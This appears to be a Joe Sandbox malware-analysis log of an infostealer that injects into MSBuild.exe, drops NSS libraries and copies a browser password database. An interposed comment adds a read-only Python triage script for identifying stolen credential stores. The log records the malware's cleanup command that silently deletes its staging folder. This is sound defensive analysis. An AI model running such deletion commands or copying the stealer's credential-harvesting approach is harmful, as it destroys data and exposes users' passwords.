Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCA0820 3_2_6CCA0820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCDA820 3_2_6CCDA820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD6C9E0 3_2_6CD6C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC849F0 3_2_6CC849F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD109B0 3_2_6CD109B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCE09A0 3_2_6CCE09A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD0A9A0 3_2_6CD0A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC88960 3_2_6CC88960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCA6900 3_2_6CCA6900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCCEA80 3_2_6CCCEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCCCA70 3_2_6CCCCA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCFEA00 3_2_6CCFEA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD08A30 3_2_6CD08A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD56BE0 3_2_6CD56BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCF0BA0 3_2_6CCF0BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC964D0 3_2_6CC964D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCEA4D0 3_2_6CCEA4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD7A480 3_2_6CD7A480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC68460 3_2_6CC68460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCB4420 3_2_6CCB4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCDA430 3_2_6CCDA430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD1A5E0 3_2_6CD1A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCDE5F0 3_2_6CCDE5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC445B0 3_2_6CC445B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD98550 3_2_6CD98550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCA8540 3_2_6CCA8540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD54540 3_2_6CD54540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCB2560 3_2_6CCB2560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCF0570 3_2_6CCF0570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC746D0 3_2_6CC746D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCAE6E0 3_2_6CCAE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCEE6E0 3_2_6CCEE6E0
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D02021 10_2_00D02021
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D340C8 10_2_00D340C8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D32088 10_2_00D32088
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D2E1CF 10_2_00D2E1CF
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D5E1A8 10_2_00D5E1A8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D5E132 10_2_00D5E132
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D32123 10_2_00D32123
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D2E272 10_2_00D2E272
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D2E27B 10_2_00D2E27B
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D38278 10_2_00D38278
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D30488 10_2_00D30488
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D2E455 10_2_00D2E455
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D2E527 10_2_00D2E527
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D68798 10_2_00D68798
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D5E738 10_2_00D5E738
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D74988 10_2_00D74988
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D34AC8 10_2_00D34AC8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D0CAF2 10_2_00D0CAF2
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D4AA47 10_2_00D4AA47
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D5AD84 10_2_00D5AD84
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D38D88 10_2_00D38D88
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D36D40 10_2_00D36D40
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D74E98 10_2_00D74E98
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D76FA8 10_2_00D76FA8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D70F18 10_2_00D70F18
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D3EF08 10_2_00D3EF08
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D3B078 10_2_00D3B078
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D371D8 10_2_00D371D8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D651A8 10_2_00D651A8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D0729C 10_2_00D0729C
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D633C8 10_2_00D633C8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D1D39B 10_2_00D1D39B
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D494C8 10_2_00D494C8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D6B778 10_2_00D6B778
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D1572C 10_2_00D1572C
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D71918 10_2_00D71918
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D59BA8 10_2_00D59BA8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D1BB36 10_2_00D1BB36
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D13C92 10_2_00D13C92
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D37DE8 10_2_00D37DE8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D01D79 10_2_00D01D79
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D2DED8 10_2_00D2DED8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D0FEF0 10_2_00D0FEF0
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: String function: 00D4A1D8 appears 152 times
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: String function: 00D07B80 appears 49 times
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: String function: 00D39978 appears 93 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6CDD09D0 appears 146 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6CC79B10 appears 32 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6CC73620 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 004104E7 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6CBDCBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6CBE94D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6CDDDAE0 appears 35 times
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: String function: 008F7B80 appears 49 times
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6532 -s 288
Source: f1r6P3j3g7.exe, 00000000.00000000.1664311173.0000000000980000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename proquota.exe vs f1r6P3j3g7.exe
Source: f1r6P3j3g7.exe Binary or memory string: OriginalFilename proquota.exe vs f1r6P3j3g7.exe
Source: f1r6P3j3g7.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: f1r6P3j3g7.exe Static PE information: Section: .data ZLIB complexity 0.9919195713141026
Source: KEGIDHJKKJ.exe.3.dr Static PE information: Section: .data ZLIB complexity 0.9912368881118881
Source: a43486128347[1].exe.3.dr Static PE information: Section: .data ZLIB complexity 0.9912368881118881
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@19/40@13/4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC07030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 3_2_6CC07030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 3_2_004114A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear, 3_2_00411807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\GKI36XO7.htm
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6532
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess908
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2664
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Temp\delays.tmp
Source: C:\ProgramData\KEGIDHJKKJ.exe Command line argument: MZx 10_2_00D02021
Source: f1r6P3j3g7.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sql[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sql[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sql[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sql[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: MSBuild.exe, MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sql[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sql[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: DAKEBA.3.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
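The SQL strings above come from two different places. The metaData and sqlite_master statements belong to the NSS libraries (softokn3.dll, nss3.dll, sql.dll, dropped by the MSBuild.exe process; the [1] suffix is the WinINet cache naming) that the payload loads to read Firefox's key4.db. The password_notes ... REFERENCES logins DDL seen in the dropped file DAKEBA is the Chromium "Login Data" schema, which indicates a copied Chrome/Edge password database stored under a random name. The Python below is an added example, not code from the Joe Sandbox report or from the malware: it classifies an unknown file by SQLite header and table set, opening it read-only so evidence is never modified, and for a Login Data copy lists the origins whose saved credentials were exposed. The table-name signatures are my assumptions about the current browser schemas, and the sample files it builds are constructed.

```python
"""Added example, not from the report or the malware: identify copied browser
credential stores by their SQLite schema during triage of dropped files.
Table-name signatures are assumptions about the Chromium "Login Data",
Firefox key4.db (NSS softokn3) and places.sqlite schemas; samples are constructed."""
import os
import pathlib
import sqlite3
import tempfile
from typing import Dict, List, Optional, Set

SQLITE_MAGIC = b"SQLite format 3\x00"  # 16-byte header of every SQLite 3 file

# Minimal table sets that identify each store (assumption: current schemas).
SIGNATURES: Dict[str, Set[str]] = {
    "chromium_login_data": {"logins", "password_notes"},
    "nss_key4_db": {"metaData", "nssPrivate", "nssPublic"},
    "firefox_places": {"moz_places", "moz_historyvisits"},
}

# password_notes DDL as it appears in the DAKEBA memory strings above.
PASSWORD_NOTES_DDL = (
    "CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, "
    "parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE "
    "CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, "
    "date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key))"
)


def _open_readonly(path: str) -> sqlite3.Connection:
    # URI form so the evidence file is never written to (no journal, no locks).
    uri = pathlib.Path(path).resolve().as_uri() + "?mode=ro&immutable=1"
    return sqlite3.connect(uri, uri=True)


def sqlite_tables(path: str) -> Optional[Set[str]]:
    """Table names in the file, or None if it is not an SQLite 3 database."""
    with open(path, "rb") as fh:
        if fh.read(16) != SQLITE_MAGIC:
            return None
    con = _open_readonly(path)
    try:
        rows = con.execute("SELECT name FROM sqlite_master WHERE type = 'table'")
        return {r[0] for r in rows}
    finally:
        con.close()


def classify_sqlite_artifact(path: str) -> str:
    """Map a file to a known store label, 'sqlite_unknown' or 'not_sqlite'."""
    tables = sqlite_tables(path)
    if tables is None:
        return "not_sqlite"
    for label, required in SIGNATURES.items():
        if required <= tables:
            return label
    return "sqlite_unknown"


def chromium_login_origins(path: str) -> List[str]:
    """For a Login Data copy, the sites whose saved credentials were exposed."""
    if classify_sqlite_artifact(path) != "chromium_login_data":
        return []
    con = _open_readonly(path)
    try:
        return [r[0] for r in con.execute("SELECT origin_url FROM logins ORDER BY id")]
    finally:
        con.close()


def build_constructed_samples(workdir: str) -> Dict[str, str]:
    """Write three constructed files: a Login Data look-alike under a random-looking
    name (as the stealer does), an unrelated SQLite DB, and a plain text file."""
    login = os.path.join(workdir, "DAKEBA")
    con = sqlite3.connect(login)
    # Subset of the real logins columns; enough for the schema match and the query.
    con.executescript(
        "CREATE TABLE logins (id INTEGER PRIMARY KEY AUTOINCREMENT, "
        "origin_url VARCHAR NOT NULL, username_value VARCHAR, password_value BLOB);"
        + PASSWORD_NOTES_DDL + ";")
    con.executemany(
        "INSERT INTO logins (origin_url, username_value, password_value) VALUES (?, ?, ?)",
        [("https://mail.example.test/", "alice", b"v10\x00ciphertext"),
         ("https://bank.example.test/", "alice", b"v10\x00ciphertext")])
    con.commit()
    con.close()

    other = os.path.join(workdir, "notes.db")
    con = sqlite3.connect(other)
    con.execute("CREATE TABLE notes (id INTEGER PRIMARY KEY, body TEXT)")
    con.commit()
    con.close()

    text = os.path.join(workdir, "readme.txt")
    with open(text, "w") as fh:
        fh.write("not a database\n")
    return {"login_data": login, "other_db": other, "text": text}


def run_demo() -> Dict[str, object]:
    """Build the samples in a temp dir, classify them and return the results."""
    with tempfile.TemporaryDirectory() as d:
        samples = build_constructed_samples(d)
        return {
            "labels": {k: classify_sqlite_artifact(p) for k, p in samples.items()},
            "origins": chromium_login_origins(samples["login_data"]),
        }


if __name__ == "__main__":
    print(run_demo())
```

Pointing this at a dropped file with a random name is the quickest way to tell whether the stealer's staging directory held a copied credential store rather than its own configuration; the read-only URI matters because opening a seized database normally can create a journal file and alter timestamps.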
Source: unknown Process created: C:\Users\user\Desktop\f1r6P3j3g7.exe "C:\Users\user\Desktop\f1r6P3j3g7.exe"
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6532 -s 288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\KEGIDHJKKJ.exe "C:\ProgramData\KEGIDHJKKJ.exe"
Source: C:\ProgramData\KEGIDHJKKJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\KEGIDHJKKJ.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 908 -s 268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BGIJDGCAEBFI" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 840
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
